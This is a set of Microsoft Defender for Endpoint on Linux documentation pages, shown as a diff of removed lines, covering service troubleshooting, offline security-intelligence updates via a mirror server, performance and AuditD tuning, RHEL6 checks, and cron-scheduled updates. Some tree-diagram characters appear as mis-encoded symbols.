- Loaded: loaded (/lib/systemd/system/mdatp.service; enabled; vendor preset: enabled)
- Active: active (running) since Thu 2020-03-26 10:37:30 IST; 23h ago
- Main PID: 1966 (wdavdaemon)
- Tasks: 105 (limit: 4915)
- CGroup: /system.slice/mdatp.service
- Γö£ΓöÇ1966 /opt/microsoft/mdatp/sbin/wdavdaemon
- Γö£ΓöÇ1967 /opt/microsoft/mdatp/sbin/wdavdaemon
- ΓööΓöÇ1968 /opt/microsoft/mdatp/sbin/wdavdaemon
- ```
-
-## Steps to troubleshoot if the mdatp service isn't running
-
-1. Check to see if `mdatp` user exists:
-
- ```bash
- id "mdatp"
- ```
-
- If there's no output, run
-
- ```bash
- sudo useradd --system --no-create-home --user-group --shell /usr/sbin/nologin mdatp
- ```
-
-2. Try enabling and restarting the service using:
-
- ```bash
- sudo service mdatp start
- ```
-
- ```bash
- sudo service mdatp restart
- ```
-
-3. If mdatp.service isn't found upon running the previous command, run:
-
- ```bash
- sudo cp /opt/microsoft/mdatp/conf/mdatp.service <systemd_path>
- ```
-
- where `<systemd_path>` is `/lib/systemd/system` for Ubuntu and Debian distributions and /usr/lib/systemd/system` for Rhel, CentOS, Oracle, and SLES. Then rerun step 2.
-
-4. If the above steps don't work, check if SELinux is installed and in enforcing mode. If so, try setting it to permissive (preferably) or disabled mode. It can be done by setting the parameter `SELINUX` to `permissive` or `disabled` in `/etc/selinux/config` file, followed by reboot. Check the man-page of selinux for more details.
-Now try restarting the mdatp service using step 2. Revert the configuration change immediately though for security reasons after trying it and reboot.
-
-5. If `/opt` directory is a symbolic link, create a bind mount for `/opt/microsoft`.
-
-6. Ensure that the daemon has executable permission.
-
- ```bash
- ls -l /opt/microsoft/mdatp/sbin/wdavdaemon
- ```
-
- ```Output
- -rwxr-xr-x 2 root root 15502160 Mar 3 04:47 /opt/microsoft/mdatp/sbin/wdavdaemon
- ```
-
- If the daemon doesn't have executable permissions, make it executable using:
-
- ```bash
- sudo chmod 0755 /opt/microsoft/mdatp/sbin/wdavdaemon
- ```
-
- and retry running step 2.
-
-7. Ensure that the file system containing wdavdaemon isn't mounted with `noexec`.
-
-## If the Defender for Endpoint service is running, but the EICAR text file detection doesn't work
-
-1. Check the file system type using:
-
- ```bash
- findmnt -T <path_of_EICAR_file>
- ```
-
- Currently supported file systems for on-access activity are listed [here](microsoft-defender-endpoint-linux.md#system-requirements). Any files outside these file systems aren't scanned.
-
-## Command-line tool mdatp isn't working
-
-1. If running the command-line tool `mdatp` gives an error `command not found`, run the following command:
-
- ```bash
- sudo ln -sf /opt/microsoft/mdatp/sbin/wdavdaemonclient /usr/bin/mdatp
- ```
-
- and try again.
-
- If none of the above steps help, collect the diagnostic logs:
-
- ```bash
- sudo mdatp diagnostic create
- ```
-
- ```Output
- Diagnostic file created: <path to file>
- ```
-
- Path to a zip file that contains the logs are displayed as an output. Reach out to our customer support with these logs.
security Linux Support Offline Security Intelligence Update https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-offline-security-intelligence-update.md
- Title: Configure Offline Security Intelligence Update for Microsoft Defender for Endpoint on Linux (preview)
-description: Offline Security Intelligence Update in Microsoft Defender for Endpoint on Linux.
-------- m365-security-- tier3-- mde-linux- Previously updated : 03/12/2024--
-# Configure Offline Security Intelligence Update for Microsoft Defender for Endpoint on Linux (preview)
--
-**Applies to:**
--- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-This document describes the Offline Security Intelligence Update feature of Microsoft Defender for Endpoint on Linux.
-
-> [!IMPORTANT]
-> Information in this article relates to a prerelease product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-This feature enables an organization to update the security intelligence (also referred to as definitions or signatures in this document) on Linux endpoints with limited or no exposure to the internet using a local hosting server (termed as *Mirror Server* in this document).
-
-Mirror Server is any server in the customer's environment that can connect to the Microsoft cloud to download the signatures. Other Linux endpoints pull the signatures from the Mirror Server at a predefined interval.
-
-Key benefits include:
--- Ability to control and manage the frequency of signature downloads on the local server & the frequency at which endpoints pull the signatures from the local server.-- Adds an extra layer of protection & control as the downloaded signatures can be tested on a test device before being propagated to the entire fleet.-- Reduces network bandwidth as now only one local server will poll MS cloud to get the latest signatures on behalf of your entire fleet.-- Local server can run any of the three OS - Windows, Mac, Linux, and isn't required to install Defender for Endpoint.-- Provides the most up to date antivirus protection as signatures are always downloaded along with the latest compatible AV engine.-- In each iteration, signature with n-1 version is moved to a backup folder on the local server. If there's any issue with the latest signature, you can pull the n-1 signature version from the backup folder to your endpoints.-- On the rare occasion the offline update fails, you can also choose to fallback to online updates from Microsoft cloud(traditional method).-
-## How Offline Security Intelligence Update works
--- Organizations need to set up a Mirror Server, which is a local Web/NFS server that is reachable by the Microsoft cloud.-- Signatures are downloaded from Microsoft Cloud on this Mirror Server by executing a script using cron job/task scheduler on the local server.-- Linux endpoints running Defender for Endpoint pull the downloaded signatures from this Mirror Server at a user-defined time interval.-- Signatures pulled on the Linux endpoints from the local server are first verified before loading it into the AV engine.-- To trigger and configure the update process, update the managed config json file on the Linux endpoints.-- The status of the update can be seen on the mdatp CLI.-
-Fig. 1: Process flow diagram on the Mirror Server for downloading the security intelligence updates
--
-Fig. 2: Process flow diagram on the Linux endpoint for security intelligence updates
-
-## Prerequisites
--- Defender for Endpoint version "101.24022.0001" or higher needs to be installed on the Linux endpoints.-- The Linux endpoints need to have connectivity to the Mirror Server.-- The Mirror Server can be either an HTTP/ HTTPS server or a network share server. For example, an NFS Server.-- The Mirror Server needs to have access to the following URLs:
- - `https://github.com/microsoft/mdatp-xplat.git`
- - `https://go.microsoft.com/fwlink/?linkid=2144709`
-- The following operating systems are supported on the Mirror Server:
- - Linux (Any Flavor)
- - Windows (Any Version)
- - Mac (Any version)
-- The Mirror Server should support bash or PowerShell.-- The following minimum system specifications are required for the Mirror Server:-
- | CPU Core| RAM | Free disk | Swap |
- |--|--|--|--|
- | 2 cores (Preferred 4 Core) | 1 GB Min (Preferred 4 GB) | 2 GB | System Dependent|
-
- > [!NOTE]
- > This configuration may vary depending on the number of requests that are served and the load each server must process.
--- The Linux endpoint must be running any of the Defender for Endpoint supported distributions.-
-## Configuring the Mirror Server
-
-> [!NOTE]
-> The management and ownership of the Mirror Server lies solely with the customer as it resides in the customer's private environment.
-
-> [!NOTE]
-> The Mirror Server does not need to have Defender for Endpoint installed.
-
-### Get the offline security intelligence downloader script
-
-Microsoft hosts an offline security intelligence downloader script on [this GitHub repo](https://github.com/microsoft/mdatp-xplat).
-
-Follow these steps to get the downloader script:
-
-#### Option 1: Clone the repo (Preferred)
--- [Install git](https://kinsta.com/knowledgebase/install-git/) on the Mirror Server.-- Navigate to the directory where you want to clone the repo.-- Execute the command: `git clone https://github.com/microsoft/mdatp-xplat.git`-
-#### Option 2: Download the zip file
--- Download the zip file of the repo [from here](https://github.com/microsoft/mdatp-xplat/archive/refs/heads/master.zip).-- Copy the zip file to the folder where you want to keep the script.-- Extract the zip.-
-> [!NOTE]
-> Schedule a [cron job](#scheduling-a-cron-job) to keep the repo/downloaded zip file updated to the latest version at regular intervals.
-
-After cloning the repo/downloaded zip file, the local directory structure should be as follows:
-
-```console
-user@vm:~/mdatp-xplat$ tree linux/definition_downloader/
-linux/definition_downloader/
-Γö£ΓöÇΓöÇ README.md
-Γö£ΓöÇΓöÇ settings.json
-Γö£ΓöÇΓöÇ settings.ps1
-Γö£ΓöÇΓöÇ xplat_offline_updates_download.ps1
-ΓööΓöÇΓöÇ xplat_offline_updates_download.sh
-
-0 directories, 5 files
-```
-
-> [!NOTE]
-> Go through the README.md file to understand in detail about how to use the script.
-
-The `settings.json` file consists of a few variables that the user can configure to determine the output of the script execution.
-
-| Field Name | Value | Description |
-|--|--|--|
-| `downloadFolder` | string | Maps to the location where the script downloads the files to |
-| `downloadLinuxUpdates` | bool | When set to true, the script downloads the Linux specific updates to the `downloadFolder` |
-| `logFilePath` | string | Sets up the diagnostic logs at a given folder. This file can be shared with Microsoft for debugging the script if there are any issues |
-| `downloadMacUpdates` | bool | The script downloads the Mac specific updates to the `downloadFolder` |
-| `downloadPreviewUpdates` | bool | Downloads the preview version of the updates available for the specific OS |
-| `backupPreviousUpdates` | bool | Allows the script to copy the previous update in the _back folder, and new updates are downloaded to `downloadFolder` |
-
-### Execute the offline security intelligence downloader script
-
-To manually execute the downloader script, configure the parameters in the `settings.json` file as per the description in the previous section, and use one of the following commands based on the OS of the Mirror Server:
--- Bash:-
- ```bash
- ./xplat_offline_updates_download.sh
- ```
--- PowerShell:-
- ```powershell
- ./xplat_offline_updates_download.ps1
- ```
-
-> [!NOTE]
-> Schedule a [cron job](#scheduling-a-cron-job) to execute this script to download the latest security intelligence updates in the Mirror Server at regular intervals.
-
-### Host the offline security intelligence updates on the Mirror Server
-
-Once the script is executed, the latest signatures get downloaded to the folder configured in the `settings.json` file (`updates.zip`).
-
-Once the signatures zip is downloaded, the Mirror Server can be used to host it. The Mirror Server can be hosted using any HTTP / HTTPS / Network share servers.
-
-Once hosted, copy the absolute path of the hosted server (up to and not including the `arch_*` directory).
-
-For example, if the script is executed with `downloadFolder=/tmp/wdav-update`, and the HTTP server (`www.example.server.com:8000`) is hosting the `/tmp/wdav-update` path, the corresponding URI is: `www.example.server.com:8000/linux/production/`
-
-Once the Mirror Server is set up, we need to propagate this URL to the Linux endpoints using the Managed Configuration as described in the next section.
-
-## Configure the Endpoints
--- Use the following sample `mdatp_managed.json` and update the parameters as per the configuration and copy the file to the location `/etc/opt/microsoft/mdatp/managed/mdatp_managed.json`.-
-```json
-{
- "cloudService": {
- "automaticDefinitionUpdateEnabled": true,
- "definitionUpdatesInterval": 1202
- },
- "antivirusEngine": {
- "offlineDefinitionUpdateUrl": "http://172.22.199.67:8000/linux/production/",
- "offlineDefintionUpdateFallbackToCloud":false,
- "offlineDefinitionUpdate": "enabled"
- }
-}
-```
-
-| Field Name | Values | Comments |
-|-|-|--|
-| `automaticDefinitionUpdateEnabled` | True / False | Determines the behavior of Defender for Endpoint attempting to perform updates automatically, is turned on or off respectively |
-| `definitionUpdatesInterval` | Numeric | Time of interval between each automatic update of signatures (in seconds) |
-| `offlineDefinitionUpdateUrl` | String | URL value generated as part of the Mirror Server set up |
-| `offlineDefinitionUpdate` | enabled / disabled | When set to `enabled`, the offline security intelligence update feature is enabled, and vice versa. |
-| `offlineDefinitionUpdateFallbackToCloud` | True / False | Determine Defender for Endpoint security intelligence update approach when offline Mirror Server fails to serve the update request. If set to true, the update is retried via the Microsoft cloud when offline security intelligence update failed, else vice versa. |
-
-> [!NOTE]
-> As of today the offline security intelligence update feature can be configured on Linux endpoints via managed json only. Integration with security settings management on the security portal is in our roadmap.
-
-### Verify the configuration
-
-To test if the settings are applied correctly on the Linux endpoints, run the following command:
-
-```bash
-mdatp health --details definitions
-```
-
-For example, a sample output would look like:
-
-```console
-user@vm:~$ mdatp health --details definitions
-automatic_definition_update_enabled : true [managed]
-definitions_updated : Mar 14, 2024 at 12:13:17 PM
-definitions_updated_minutes_ago : 2
-definitions_version : "1.407.417.0"
-definitions_status : "up_to_date"
-definitions_update_source_uri : "https://go.microsoft.com/fwlink/?linkid=2144709"
-definitions_update_fail_reason : ""
-offline_definition_url_configured : "http://172.XX.XXX.XX:8000/linux/production/" [managed]
-offline_definition_update : "enabled" [managed]
-offline_definition_update_verify_sig : "enabled"
-offline_definition_update_fallback_to_cloud : false[managed]
-```
-
-## Triggering the Offline Security Intelligence Updates
-
-### Automatic update
--- If the fields `automaticDefinitionUpdateEnabled` and 'offline_definition_update' in the managed json are set to true, then the offline security intelligence updates are triggered automatically at periodic intervals.-- By default, this periodic interval is 8 hours. But it can be configured by setting the `definitionUpdatesInterval` in the managed json.-
-### Manual update
--- In order to trigger the offline security intelligence update manually to download the signatures from the Mirror Server on the Linux endpoints, run the command:-
- ```bash
- mdatp definitions update
- ```
-
-### Check update status
--- After triggering the offline security intelligence update by either the automatic or manual method, verify that the update was successful by running the command: `mdatp health --details --definitions`.-- Verify the following fields:-
- ```console
- user@vm:~$ mdatp health --details definitions
- ...
- definitions_status : "up_to_date"
- ...
- definitions_update_fail_reason : ""
- ...
- ```
-
-## Troubleshooting and Diagnostics
-
-### Issues: MDATP update failure
--- Update stuck or update didn't trigger-- Update failed-
-### Common Troubleshooting Steps
--- Check the status of the offline security intelligence update feature by using the command:-
- ```bash
- mdatp health --details definitions
- ```
-
- - This command should provide us with some user-friendly message in the `definitions_update_fail_reason` section.
- - Check if `offline_definition_update` and `offline_definition_update_verify_sig` is enabled.
- - Check if `definitions_update_source_uri` is equal to `offline_definition_url_configured`
- - `definitions_update_source_uri` is the source from where the signatures were downloaded.
- - `offline_definition_url_configured` is the source from where signatures should be downloaded, the one mentioned in the managed config file.
--- Try performing the connectivity test to check if Mirror Server is reachable from the host:-
- ```bash
- mdatp connectivity test
- ```
--- Try to trigger manual update using the command:-
- ```bash
- mdatp definitions update
- ```
-
-## Useful Links
-
-### Downloader script
--- [GitHub repo](https://github.com/microsoft/mdatp-xplat)-
-### Scheduling a cron job
--- [Schedule a cron job in Linux](https://phoenixnap.com/kb/set-up-cron-job-linux)-- [Schedule a cron job in macOS](https://phoenixnap.com/kb/cron-job-mac)-- [Schedule a cron job in Windows](https://phoenixnap.com/kb/cron-job-windows)
security Linux Support Perf https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-perf.md
- Title: Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux
-description: Troubleshoot performance issues in Microsoft Defender for Endpoint on Linux.
---- Previously updated : 01/18/2023---- m365-security-- tier3-- mde-linux----
-# Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux
--
-**Applies to:**
--- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-This document provides instructions on how to narrow down performance issues related to Defender for Endpoint on Linux using the available diagnostic tools to be able to understand and mitigate the existing resource shortages and the processes that are making the system into such situations. Performance problems are mainly caused by bottlenecks in one or more hardware subsystems, depending on the profile of resource utilization on the system. Sometimes applications are sensitive to disk I/O resources and may need more CPU capacity, and sometimes some configurations are not sustainable, and may trigger too many new processes, and open too many file descriptors.
-
-Depending on the applications that you are running and your device characteristics, you may experience suboptimal performance when running Defender for Endpoint on Linux. In particular, applications or system processes that access many resources such as CPU, Disk, and Memory over a short timespan can lead to performance issues in Defender for Endpoint on Linux.
-
-> [!WARNING]
-> Before starting, **please make sure that other security products are not currently running on the device**. Multiple security products may conflict and impact the host performance.
-
-## Troubleshoot performance issues using Real-time Protection Statistics
-
-**Applies to:**
-- Only performance issues related to AV-
-Real-time protection (RTP) is a feature of Defender for Endpoint on Linux that continuously monitors and protects your device against threats. It consists of file and process monitoring and other heuristics.
-
-The following steps can be used to troubleshoot and mitigate these issues:
-
-1. Disable real-time protection using one of the following methods and observe whether the performance improves. This approach helps narrow down whether Defender for Endpoint on Linux is contributing to the performance issues.
-
- If your device is not managed by your organization, real-time protection can be disabled from the command line:
-
- ```bash
- mdatp config real-time-protection --value disabled
- ```
-
- ```Output
- Configuration property updated
- ```
-
- If your device is managed by your organization, real-time protection can be disabled by your administrator using the instructions in [Set preferences for Defender for Endpoint on Linux](linux-preferences.md).
-
- > [!NOTE]
- > If the performance problem persists while real-time protection is off, the origin of the problem could be the endpoint detection and response (EDR) component. In this case please follow the steps from the **Troubleshoot performance issues using Microsoft Defender for Endpoint Client Analyzer** section of this article.
-
-2. To find the applications that are triggering the most scans, you can use real-time statistics gathered by Defender for Endpoint on Linux.
-
- > [!NOTE]
- > This feature is available in version 100.90.70 or newer.
-
- This feature is enabled by default on the `Dogfood` and `InsiderFast` channels. If you're using a different update channel, this feature can be enabled from the command line:
-
- ```bash
- mdatp config real-time-protection-statistics --value enabled
- ```
-
- This feature requires real-time protection to be enabled. To check the status of real-time protection, run the following command:
-
- ```bash
- mdatp health --field real_time_protection_enabled
- ```
-
- Verify that the `real_time_protection_enabled` entry is `true`. Otherwise, run the following command to enable it:
-
- ```bash
- mdatp config real-time-protection --value enabled
- ```
-
- ```Output
- Configuration property updated
- ```
-
- To collect current statistics, run:
-
- ```bash
- mdatp diagnostic real-time-protection-statistics --output json
- ```
-
- > [!NOTE]
- > Using `--output json` (note the double dash) ensures that the output format is ready for parsing.
-
- The output of this command will show all processes and their associated scan activity.
-
-3. On your Linux system, download the sample Python parser **high_cpu_parser.py** using the command:
-
- ```bash
- wget -c https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/linux/diagnostic/high_cpu_parser.py
- ```
-
- The output of this command should be similar to the following:
-
- ```Output
- --2020-11-14 11:27:27-- https://raw.githubusercontent.com/microsoft.mdatp-xplat/master/linus/diagnostic/high_cpu_parser.py
- Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.xxx.xxx
- Connecting to raw.githubusercontent.com (raw.githubusercontent.com)| 151.101.xxx.xxx| :443... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 1020 [text/plain]
- Saving to: 'high_cpu_parser.py'
- 100%[===========================================>] 1,020 --.-K/s in 0s
- ```
-
-4. Next, type the following commands:
-
- ```bash
- mdatp diagnostic real-time-protection-statistics --output json | python high_cpu_parser.py
- ```
-
- The output of the above is a list of the top contributors to performance issues. The first column is the process identifier (PID), the second column is the process name, and the last column is the number of scanned files, sorted by impact.
- For example, the output of the command will be something like the below:
-
- ```Output
- ... > mdatp diagnostic real-time-protection-statistics --output json | python high_cpu_parser.py | head
- 27432 None 76703
- 73467 actool 1249
- 73914 xcodebuild 1081
- 73873 bash 1050
- 27475 None 836
- 1 launchd 407
- 73468 ibtool 344
- 549 telemetryd_v1 325
- 4764 None 228
- 125 CrashPlanService 164
- ```
-
- To improve the performance of Defender for Endpoint on Linux, locate the one with the highest number under the `Total files scanned` row and add an exclusion for it. For more information, see [Configure and validate exclusions for Defender for Endpoint on Linux](linux-exclusions.md).
-
- > [!NOTE]
- > The application stores statistics in memory and only keeps track of file activity since it was started and real-time protection was enabled. Processes that were launched before or during periods when real time protection was off are not counted. Additionally, only events which triggered scans are counted.
-
-5. Configure Microsoft Defender for Endpoint on Linux with exclusions for the processes or disk locations that contribute to the performance issues and re-enable real-time protection.
-
- For more information, see [Configure and validate exclusions for Microsoft Defender for Endpoint on Linux](linux-exclusions.md).
-
-## Troubleshoot performance issues using Microsoft Defender for Endpoint Client Analyzer
-
-**Applies to:**
-- Performance issues of all available Defender for Endpoint components such as AV and EDR-
-The Microsoft Defender for Endpoint Client Analyzer (MDECA) can collect traces, logs, and diagnostic information in order to troubleshoot performance issues on [onboarded devices](/microsoft-365/security/defender-endpoint/onboard-configure) on Linux.
-
-> [!NOTE]
->
-> - The Microsoft Defender for Endpoint Client Analyzer tool is regularly used by Microsoft Customer Support Services (CSS) to collect information such as (but not limited to) IP addresses, PC names that will help troubleshoot issues you may be experiencing with Microsoft Defender for Endpoint. For more information about our privacy statement, see [Microsoft Privacy Statement](https://privacy.microsoft.com/privacystatement).
-> - As a general best practice, it is recommended to update the [Microsoft Defender for Endpoint agent to latest available version](mac-whatsnew.md) and confirming that the issue still persists before investigating further.
-
-To run the client analyzer for troubleshooting performance issues, see [Run the client analyzer on macOS and Linux](run-analyzer-macos-linux.md).
-
-> [!NOTE]
-> In case after following the above steps, the performance problem persists, please contact customer support for further instructions and mitigation.
-
-## Troubleshoot AuditD performance issues
-
-**Background:**
--- Microsoft Defender for Endpoint on Linux OS distributions uses AuditD framework to collect certain types of telemetry events.--- System events captured by rules added to `/etc/audit/rules.d/` will add to audit.log(s) and might affect host auditing and upstream collection.--- Events added by Microsoft Defender for Endpoint on Linux will be tagged with `mdatp` key.--- If the AuditD service is misconfigured or offline, then some events might be missing. To troubleshoot such an issue, refer to: [Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint on Linux.](linux-support-events.md)-
-In certain server workloads, two issues might be observed:
--- **High CPU** resource consumption from ***mdatp_audisp_plugin*** process.--- ***/var/log/audit/audit.log*** becoming large or frequently rotating.-
-These issues may occur on servers with many events flooding AuditD.
-
-> [!NOTE]
-> As a best practice, we recommend to configure AuditD logs to rotate when the maximum file size limit is reached.
->
-> This will prevent AuditD logs accumulating in a single file and the rotated log files can be moved out to save disk space.
->
-> To achieve this, you can set the value for **max_log_file_action** to **rotate** in the [auditd.conf](https://linux.die.net/man/8/auditd.conf) file.
-
-This can happen if there are multiple consumers for AuditD, or too many rules with the combination of Microsoft Defender for Endpoint and third party consumers, or high workload that generates a lot of events.
-
-To troubleshoot such issues, begin by [collecting MDEClientAnalyzer logs](run-analyzer-macos-linux.md) on the sample affected server.
-
-> [!NOTE]
-> As a general best practice, it is recommended to update the [Microsoft Defender for Endpoint agent to latest available version](linux-whatsnew.md) and confirming issue still persists before investigating further.
->
-> That there are additional configurations that can affect AuditD subsystem CPU strain.
->
-> Specifically, in [auditd.conf](https://linux.die.net/man/8/auditd.conf), the value for **disp_qos** can be set to "lossy" to reduce the high CPU consumption.
->
-> However, this means that some events may be dropped during peak CPU consumption.
-
-### XMDEClientAnalyzer
-
-When you use [XMDEClientAnalyzer](run-analyzer-macos-linux.md), the following files will display output that provides insights to help you troubleshoot issues.
--- auditd_info.txt-- auditd_log_analysis.txt-
-#### auditd_info.txt
-
-Contains general AuditD configuration and will display:
--- What processes are registered as AuditD consumers.--- **Auditctl -s** output with **enabled=2**-
- - Suggests auditd is in immutable mode (requires restart for any config changes to take effect).
--- **Auditctl -l** output-
- - Will show what rules are currently loaded into the kernel (which may be different that what exists on disk in "/etc/auditd/rules.d/mdatp.rules").
-
- - Will show which rules are related to Microsoft Defender for Endpoint.
-
-#### auditd_log_analysis.txt
-
-Contains important aggregated information that is useful when investigating AuditD performance issues.
--- Which component owns the most reported events (Microsoft Defender for Endpoint events will be tagged with `key=mdatp`).--- The top reporting initiators.--- The most common system calls (network or filesystem events, and others).--- What file system paths are the noisiest.-
-**To mitigate most AuditD performance issues, you can implement AuditD exclusion. If the given exclusions do not improve the performance then we can use the rate limiter option. This will reduce the number of events being generated by AuditD altogether.**
-
-> [!NOTE]
-> Exclusions should be made only for low threat and high noise initiators or paths. For example, do not exclude /bin/bash which risks creating a large blind spot.
-> [Common mistakes to avoid when defining exclusions](/microsoft-365/security/defender-endpoint/common-exclusion-mistakes-microsoft-defender-antivirus).
-
-### Exclusion Types
-
-The XMDEClientAnalyzer support tool contains syntax that can be used to add AuditD exclusion configuration rules:
-
-AuditD exclusion ΓÇô support tool syntax help:
--
-**By initiator**
--- **-e/ -exe** full binary path > Removes all events by this initiator-
-**By path**
--- **-d / -dir** full path to a directory > Removes filesystem events targeting this directory-
-Examples:
-
-If "`/opt/app/bin/app`" writes to "`/opt/app/cfg/logs/1234.log`", then you can use the support tool to exclude with various options:
-
-`-e /opt/app/bin/app`
-
-`-d /opt/app/cfg`
-
-`-x /usr/bin/python /etc/usercfg`
-
-`-d /usr/app/bin/`
-
-More examples:
-
-`./mde_support_tool.sh exclude -p <process id>`
-
-`./mde_support_tool.sh exclude -e <process name>`
-
-To exclude more than one item - concatenate the exclusions into one line:
-
-`./mde_support_tool.sh exclude -e <process name> -e <process name 2> -e <process name3>`
-
-The -x flag is used to exclude access to subdirectories by specific initiators for example:
-
-`./mde_support_tool.sh exclude -x /usr/sbin/mv /tmp`
-
-The above will exclude monitoring of /tmp subfolder, when accessed by mv process.
-
-### Rate Limiter
-
-The XMDEClientAnalyzer support tool contains syntax that can be used to limit the number of events being reported by the auditD plugin. This option will set the rate limit globally for AuditD causing a drop in all the audit events.
-
-> [!NOTE]
-> This functionality should be carefully used as limits the number of events being reported by the auditd subsystem as a whole. This could reduces the number of events for other subscribers as well.
-
-The ratelimit option can be used to enable/disable this rate limit.
-
-Enable: `./mde_support_tool.sh ratelimit -e true`
-
-Disable: `./mde_support_tool.sh ratelimit -e false`
-
-When the ratelimit is enabled a rule will be added in AuditD to handle 2500 events/sec.
-
-> [!NOTE]
-> Please contact Microsoft support if you need assistance with analyzing and mitigating AuditD related performance issues, or with deploying AuditD exclusions at scale.
-
-## See also
--- [Investigate agent health issues](health-status.md)
security Linux Support Rhel https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-rhel.md
- Title: Troubleshoot issues for Microsoft Defender for Endpoint on Linux RHEL6
-description: Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on Linux
-------- m365-security-- tier3-- mde-linux-- Previously updated : 10/06/2021--
-# Troubleshoot issues for Microsoft Defender for Endpoint on Linux RHEL6
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-This article provides guidance on how to troubleshoot issues you might encounter with Microsoft Defender for Linux on Red Hat Linux 6 (RHEL 6) or higher.
-
-After the package (mdatp_XXX.XX.XX.XX.x86_64.rpm) is installed, take actions provided to verify that the installation was successful.
--
-## Check the service health
-
-Use the following command to check the service health:
-
-```bash
-mdatp health
-```
-
-## Verify that the service is running
-
-Use the following command to verify that the service is running:
-
-```bash
-service mdatp status
-```
-
-Expected output: `mdatp start/running, process 4517`
-
-## Verify the distribution and kernel version
-The distribution and kernel versions should be on the supported list.
-
-Use the following command to get the distribution version:
-
-```bash
-cat /etc/redhat-release (or /etc/system-release)
-```
-
-Use the following command to get the kernel version:
-
-```bash
-uname -r
-```
-## Check if mdatp audisp process is running
-The expected output is that the process is running.
-
-Use the following command to check:
-
-```bash
-pidof mdatp_audisp_plugin
-```
-
-## Check TALPA modules
-There should be nine modules loaded.
-
-Use the following command to check:
-
-```bash
-lsmod | grep talpa
-```
-
-Expected output: Enabled
-
-```bash
-talpa_pedconnector 878 0
-
-talpa_pedevice 5189 2 talpa_pedconnector
-
-talpa_vfshook 32300 1
-
-talpa_vcdevice 4947 1
-
-talpa_syscall 9127 0
-
-talpa_core 90699 4 talpa_vfshook,talpa_vcdevice,talpa_syscall
-
-talpa_linux 29424 5 talpa_vfshook,talpa_vcdevice,talpa_syscall,talpa_core
-
-talpa_syscallhookprobe 882 0
-
-talpa_syscallhook 14987 2 talpa_vfshook,talpa_syscallhookprobe
-```
--
-```bash
-lsmod | grep talpa | wc -l
-```
-
-Expected output: 9
-
-## Check TALPA status
-
-```bash
-cat /proc/sys/talpa/interceptors/VFSHookInterceptor/status
-```
-
-Debug log files (apart from the 'mdatp diagnostic create' bundle)
-
-```bash
-/var/log/audit/audit.log
-
-/var/log/messages
-
-semanage fcontext -l > selinux.log
-```
-
-
-Performance and Memory
-
-```bash
-top -p <wdavdaemon pid>
-
-pmap -x <wdavdaemon pid>
-```
-
-Where `<wdavdaemon pid>` can be found using `pidof wdavdaemon`.
-
security Linux Update Mde Linux https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-update-mde-linux.md
- Title: How to schedule an update of the Microsoft Defender for Endpoint (Linux)
-description: Learn how to schedule an update of the Microsoft Defender for Endpoint (Linux) to better protect your organization's assets.
-------- m365-security-- tier3-- mde-linux-- Previously updated : 01/26/2024--
-# Schedule an update of the Microsoft Defender for Endpoint (Linux)
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-To run an update on Microsoft Defender for Endpoint on Linux, see [Deploy updates for Microsoft Defender for Endpoint on Linux](/microsoft-365/security/defender-endpoint/linux-updates).
-
-Linux (and Unix) have a tool called **crontab** (similar to Task Scheduler) to be able to run scheduled tasks.
-
-## Pre-requisite
-
-> [!NOTE]
-> To get a list of all the time zones, run the following command:
-> `timedatectl list-timezones`
->
-> Examples for timezones:
->
-> - `America/Los_Angeles`
-> - `America/New_York`
-> - `America/Chicago`
-> - `America/Denver`
-
-## To set the Cron job
-
-Use the following commands:
-
-### Backup crontab entries
-
-```bash
-sudo crontab -l > /var/tmp/cron_backup_201118.dat
-```
-
-> [!NOTE]
-> Where 201118 == YYMMDD
-
-> [!TIP]
-> Do this before you edit or remove.
-
-To edit the crontab, and add a new job as a root user:
-
-```bash
-sudo crontab -e
-```
-
-> [!NOTE]
-> The default editor is VIM.
-
-You might see:
-
-```output
-0 * * * * /etc/opt/microsoft/mdatp/logrorate.sh
-```
-
-And
-
-```output
-0 2 * * sat /bin/mdatp scan quick>~/mdatp_cron_job.log
-```
-
